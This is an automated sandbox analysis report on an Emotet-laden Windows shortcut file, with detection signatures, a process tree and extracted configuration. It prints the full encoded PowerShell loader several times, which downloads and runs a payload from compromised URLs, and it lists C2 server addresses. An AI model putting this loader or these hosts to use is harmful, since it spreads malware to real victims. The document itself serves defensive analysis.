Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2022-04-26_1045.exe.lnk

Overview

General Information

Sample Name:2022-04-26_1045.exe.lnk
Analysis ID:615497
MD5:a4e45d28631ea2dd178f314f1362f213
SHA1:ae71fe52df0fa3762866eeb6fb4829cc7c6877ce
SHA256:0110ac3095c40757e96ec0d66c639cdbdb7c1247eed0ed79281820423f164992
Infos:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sigma detected: BlueMashroom DLL Load
Multi AV Scanner detection for domain / URL
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Regsvr32 Anomaly
Bypasses PowerShell execution policy
Changes security center settings (notifications, updates, antivirus, firewall)
Suspicious powershell command line found
Machine Learning detection for sample
Powershell drops PE file
Sigma detected: Regsvr32 Network Activity
Sigma detected: Regsvr32 Command Line Without DLL
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: Change PowerShell Policies to an Unsecure Level
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 6424 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "2022-04-26_1045.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2ZvY3VzbWVkaWNhLmluL2ZtbGliL0l4QkFCTWgwSTJjTE0zcXExR1Z2LyIsImh0dHA6Ly9kZW1vMzQuY2tnLmhrL3NlcnZpY2UvaGhNWnJmQzdNbm05SkQvIiwiaHR0cDovL2NvbGVnaW91bmFtdW5vLmVzL2NnaS1iaW4vRS8iLCJodHRwOi8vY2lwcm8ubXgvcHJlbnNhL3NpWlA2OXJCRm1pYkR2dVRQMUwvIiwiaHR0cDovL2ZpbG1tb2d6aXZvdGEucnMvU3ByeUFzc2V0cy9nRFIvIiwiaHR0cHM6Ly9jcmVlbW8ucGwvd3AtYWRtaW4vWktTMURjZHF1VVQ0QmI4S2IvIik7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGVudjpURU1QL0dNT1dEVFJmSUoueHRxO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvR01PV0RUUmZJSi54dHE7YnJlYWt9IGNhdGNoIHsgfX0=')) > "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1 MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1 MD5: 95000560239032BC68B4C2FDFCDEF913)
      • regsvr32.exe (PID: 6932 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/GMOWDTRfIJ.xtq MD5: D78B75FC68247E8A63ACBA846182740E)
        • regsvr32.exe (PID: 7132 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\Atpvfjzdexae\enxldhj.oxc" MD5: D78B75FC68247E8A63ACBA846182740E)
  • svchost.exe (PID: 7060 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7148 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 908 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5712 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 5516 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 5816 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6920 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 3368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 5672 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6916 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4756 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6636 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3420 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["138.201.142.73:8080", "138.197.147.101:443", "134.195.212.50:7080", "104.168.154.79:8080", "149.56.131.28:8080", "129.232.188.93:443", "212.24.98.99:8080", "119.193.124.41:7080", "45.118.115.99:8080", "188.44.20.25:443", "103.132.242.26:8080", "201.94.166.162:443", "1.234.21.73:7080", "206.189.28.199:8080", "185.8.212.130:7080", "82.165.152.127:8080", "176.104.106.96:8080", "173.212.193.249:8080", "167.99.115.35:8080", "209.126.98.206:8080", "185.157.82.211:8080", "212.237.17.99:8080", "185.4.135.165:8080", "51.91.7.5:8080", "187.84.80.182:443", "164.68.99.3:8080", "107.182.225.142:8080", "58.227.42.236:80", "103.75.201.2:443", "101.50.0.91:8080", "216.158.226.206:443", "151.106.112.196:8080", "45.235.8.30:8080", "146.59.226.45:443", "45.176.232.124:443", "134.122.66.193:8080", "51.254.140.238:7080", "131.100.24.231:80", "167.172.253.162:8080", "50.30.40.196:8080", "203.114.109.124:443", "94.23.45.86:4143", "189.126.111.200:7080", "160.16.142.56:8080", "27.54.89.58:8080", "5.9.116.246:8080", "46.55.222.11:443", "209.97.163.214:443", "110.232.117.186:8080", "1.234.2.232:8080", "153.126.146.25:7080", "183.111.227.137:8080", "196.218.30.83:443", "103.70.28.102:8080", "51.91.76.89:8080", "91.207.28.33:8080", "72.15.201.15:8080", "103.43.46.182:443", "209.250.246.206:443", "197.242.150.244:8080", "159.65.88.10:8080", "172.104.251.154:8080", "158.69.222.101:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.518723563.0000000002CD1000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000006.00000002.296695809.00000000013B1000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000006.00000002.296664424.0000000001380000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000008.00000002.518667146.0000000002C90000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          Process Memory Space: powershell.exe PID: 6424PowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
          • 0x89943:$sa2: -encodedCommand
          • 0x8996f:$sa2: -encodedCommand
          • 0x8a05b:$sa2: -EncodedCommand
          • 0x8ab7c:$sa2: -EncodedCommand
          • 0x8ac17:$sa2: -encodedCommand
          • 0x89e36:$sc2: -NoProfile
          • 0x5f4ef:$sd2: -NonInteractive
          • 0x89e77:$sd2: -NonInteractive
          • 0x69c5:$se3: -executionpolicy bypass
          • 0x1964f:$se3: -executionpolicy bypass
          • 0x19a80:$se3: -executionpolicy bypass
          • 0x1a496:$se3: -executionpolicy bypass
          • 0x1a940:$se3: -executionpolicy bypass
          • 0x1ae85:$se3: -executionpolicy bypass
          • 0x1b2b5:$se3: -executionpolicy bypass
          • 0x1bf7a:$se3: -executionpolicy bypass
          • 0x1c5a0:$se3: -executionpolicy bypass
          • 0x3f11c:$se3: -executionpolicy bypass
          • 0x3f541:$se3: -executionpolicy bypass
          • 0x3fc99:$se3: -executionpolicy bypass
          • 0x40143:$se3: -executionpolicy bypass
          Click to see the 2 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          8.2.regsvr32.exe.2c90000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            8.2.regsvr32.exe.2c90000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              6.2.regsvr32.exe.1380000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                6.2.regsvr32.exe.1380000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: BlueMashroom DLL Load
                  Source: Process startedAuthor: Florian Roth, Tim Shelton: Data: Command: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/GMOWDTRfIJ.xtq, CommandLine: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/GMOWDTRfIJ.xtq, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6624, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/GMOWDTRfIJ.xtq, ProcessId: 6932, ProcessName: regsvr32.exe
                  Sigma detected: Suspicious Script Execution From Temp Folder
                  Source: Process startedAuthor: Florian Roth, Max Altgelt: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "2022-04-26_1045.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2ZvY3VzbWVkaWNhLmluL2ZtbGliL0l4QkFCTWgwSTJjTE0zcXExR1Z2LyIsImh0dHA6Ly9kZW1vMzQuY2tnLmhrL3NlcnZpY2UvaGhNWnJmQzdNbm05SkQvIiwiaHR0cDovL2NvbGVnaW91bmFtdW5vLmVzL2NnaS1iaW4vRS8iLCJodHRwOi8vY2lwcm8ubXgvcHJlbnNhL3NpWlA2OXJCRm1pYkR2dVRQMUwvIiwiaHR0cDovL2ZpbG1tb2d6aXZvdGEucnMvU3ByeUFzc2V0cy9nRFIvIiwiaHR0cHM6Ly9jcmVlbW8ucGwvd3AtYWRtaW4vWktTMURjZHF1VVQ0QmI4S2IvIik7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGVudjpURU1QL0dNT1dEVFJmSUoueHRxO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvR01PV0RUUmZJSi54dHE7YnJlYWt9IGNhdGNoIHsgfX0=')) > "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6424, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, ProcessId: 6624, ProcessName: powershell.exe
                  Sigma detected: Regsvr32 Anomaly
                  Source: Process startedAuthor: Florian Roth, oscd.community: Data: Command: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/GMOWDTRfIJ.xtq, CommandLine: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/GMOWDTRfIJ.xtq, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6624, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/GMOWDTRfIJ.xtq, ProcessId: 6932, ProcessName: regsvr32.exe
                  Sigma detected: Regsvr32 Network Activity
                  Source: Network ConnectionAuthor: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 138.201.142.73, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Windows\System32\regsvr32.exe, Initiated: true, ProcessId: 7132, Protocol: tcp, SourceIp: 192.168.2.3, SourceIsIpv6: false, SourcePort: 49756
                  Sigma detected: Regsvr32 Command Line Without DLL
                  Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/GMOWDTRfIJ.xtq, CommandLine: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/GMOWDTRfIJ.xtq, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6624, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/GMOWDTRfIJ.xtq, ProcessId: 6932, ProcessName: regsvr32.exe
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "2022-04-26_1045.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2ZvY3VzbWVkaWNhLmluL2ZtbGliL0l4QkFCTWgwSTJjTE0zcXExR1Z2LyIsImh0dHA6Ly9kZW1vMzQuY2tnLmhrL3NlcnZpY2UvaGhNWnJmQzdNbm05SkQvIiwiaHR0cDovL2NvbGVnaW91bmFtdW5vLmVzL2NnaS1iaW4vRS8iLCJodHRwOi8vY2lwcm8ubXgvcHJlbnNhL3NpWlA2OXJCRm1pYkR2dVRQMUwvIiwiaHR0cDovL2ZpbG1tb2d6aXZvdGEucnMvU3ByeUFzc2V0cy9nRFIvIiwiaHR0cHM6Ly9jcmVlbW8ucGwvd3AtYWRtaW4vWktTMURjZHF1VVQ0QmI4S2IvIik7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGVudjpURU1QL0dNT1dEVFJmSUoueHRxO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvR01PV0RUUmZJSi54dHE7YnJlYWt9IGNhdGNoIHsgfX0=')) > "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6424, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, ProcessId: 6624, ProcessName: powershell.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "2022-04-26_1045.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2ZvY3VzbWVkaWNhLmluL2ZtbGliL0l4QkFCTWgwSTJjTE0zcXExR1Z2LyIsImh0dHA6Ly9kZW1vMzQuY2tnLmhrL3NlcnZpY2UvaGhNWnJmQzdNbm05SkQvIiwiaHR0cDovL2NvbGVnaW91bmFtdW5vLmVzL2NnaS1iaW4vRS8iLCJodHRwOi8vY2lwcm8ubXgvcHJlbnNhL3NpWlA2OXJCRm1pYkR2dVRQMUwvIiwiaHR0cDovL2ZpbG1tb2d6aXZvdGEucnMvU3ByeUFzc2V0cy9nRFIvIiwiaHR0cHM6Ly9jcmVlbW8ucGwvd3AtYWRtaW4vWktTMURjZHF1VVQ0QmI4S2IvIik7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGVudjpURU1QL0dNT1dEVFJmSUoueHRxO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvR01PV0RUUmZJSi54dHE7YnJlYWt9IGNhdGNoIHsgfX0=')) > "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6424, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, ProcessId: 6624, ProcessName: powershell.exe
                  Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132954651733505451.6424.DefaultAppDomain.powershell
                  Source: Process startedAuthor: frack113: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "2022-04-26_1045.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2ZvY3VzbWVkaWNhLmluL2ZtbGliL0l4QkFCTWgwSTJjTE0zcXExR1Z2LyIsImh0dHA6Ly9kZW1vMzQuY2tnLmhrL3NlcnZpY2UvaGhNWnJmQzdNbm05SkQvIiwiaHR0cDovL2NvbGVnaW91bmFtdW5vLmVzL2NnaS1iaW4vRS8iLCJodHRwOi8vY2lwcm8ubXgvcHJlbnNhL3NpWlA2OXJCRm1pYkR2dVRQMUwvIiwiaHR0cDovL2ZpbG1tb2d6aXZvdGEucnMvU3ByeUFzc2V0cy9nRFIvIiwiaHR0cHM6Ly9jcmVlbW8ucGwvd3AtYWRtaW4vWktTMURjZHF1VVQ0QmI4S2IvIik7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGVudjpURU1QL0dNT1dEVFJmSUoueHRxO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvR01PV0RUUmZJSi54dHE7YnJlYWt9IGNhdGNoIHsgfX0=')) > "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6424, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 6432, ProcessName: conhost.exe

                  Snort Signatures

                  Timestamp:04/26/22-09:46:56.833835 04/26/22-09:46:56.833835
                  SID:2404310
                  Source Port:49756
                  Destination Port:8080
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 6.2.regsvr32.exe.1380000.0.raw.unpackMalware Configuration Extractor: Emotet {"C2 list": ["138.201.142.73:8080", "138.197.147.101:443", "134.195.212.50:7080", "104.168.154.79:8080", "149.56.131.28:8080", "129.232.188.93:443", "212.24.98.99:8080", "119.193.124.41:7080", "45.118.115.99:8080", "188.44.20.25:443", "103.132.242.26:8080", "201.94.166.162:443", "1.234.21.73:7080", "206.189.28.199:8080", "185.8.212.130:7080", "82.165.152.127:8080", "176.104.106.96:8080", "173.212.193.249:8080", "167.99.115.35:8080", "209.126.98.206:8080", "185.157.82.211:8080", "212.237.17.99:8080", "185.4.135.165:8080", "51.91.7.5:8080", "187.84.80.182:443", "164.68.99.3:8080", "107.182.225.142:8080", "58.227.42.236:80", "103.75.201.2:443", "101.50.0.91:8080", "216.158.226.206:443", "151.106.112.196:8080", "45.235.8.30:8080", "146.59.226.45:443", "45.176.232.124:443", "134.122.66.193:8080", "51.254.140.238:7080", "131.100.24.231:80", "167.172.253.162:8080", "50.30.40.196:8080", "203.114.109.124:443", "94.23.45.86:4143", "189.126.111.200:7080", "160.16.142.56:8080", "27.54.89.58:8080", "5.9.116.246:8080", "46.55.222.11:443", "209.97.163.214:443", "110.232.117.186:8080", "1.234.2.232:8080", "153.126.146.25:7080", "183.111.227.137:8080", "196.218.30.83:443", "103.70.28.102:8080", "51.91.76.89:8080", "91.207.28.33:8080", "72.15.201.15:8080", "103.43.46.182:443", "209.250.246.206:443", "197.242.150.244:8080", "159.65.88.10:8080", "172.104.251.154:8080", "158.69.222.101:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
                  Multi AV Scanner detection for submitted file
                  Source: 2022-04-26_1045.exe.lnkVirustotal: Detection: 32%Perma Link
                  Antivirus detection for URL or domain
                  Source: http://focusmedica.in/fmlib/IxBAvira URL Cloud: Label: malware
                  Source: http://focusmedica.in/fmlib/IxBABMh0I2cLM3qq1GVv/Avira URL Cloud: Label: malware
                  Source: http://filmmogzivota.rs/SpryAssets/gDR/Avira URL Cloud: Label: malware
                  Source: http://colegiounamuno.es/cgi-bin/E/Avira URL Cloud: Label: malware
                  Source: http://focusmedica.in/Avira URL Cloud: Label: malware
                  Source: https://creemo.pl/wp-admin/ZKS1DcdquUT4Bb8Kb/Avira URL Cloud: Label: malware
                  Source: http://focusmedica.inAvira URL Cloud: Label: malware
                  Source: http://cipro.mx/prensa/siZP69rBFmibDvuTP1L/Avira URL Cloud: Label: malware
                  Source: http://demo34.ckg.hk/service/hhMZrfC7Mnm9JD/Avira URL Cloud: Label: malware
                  Multi AV Scanner detection for domain / URL
                  Source: focusmedica.inVirustotal: Detection: 13%Perma Link
                  Machine Learning detection for sample
                  Source: 2022-04-26_1045.exe.lnkJoe Sandbox ML: detected
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\GMOWDTRfIJ.xtqJoe Sandbox ML: detected
                  Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_02CE8CAC FindFirstFileW,FindNextFileW,FindClose,8_2_02CE8CAC

                  Networking

                  barindex
                  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                  Source: TrafficSnort IDS: 2404310 ET CNC Feodo Tracker Reported CnC Server TCP group 6 192.168.2.3:49756 -> 138.201.142.73:8080
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 138.201.142.73 8080Jump to behavior
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorIPs: 138.201.142.73:8080
                  Source: Malware configuration extractorIPs: 138.197.147.101:443
                  Source: Malware configuration extractorIPs: 134.195.212.50:7080
                  Source: Malware configuration extractorIPs: 104.168.154.79:8080
                  Source: Malware configuration extractorIPs: 149.56.131.28:8080
                  Source: Malware configuration extractorIPs: 129.232.188.93:443
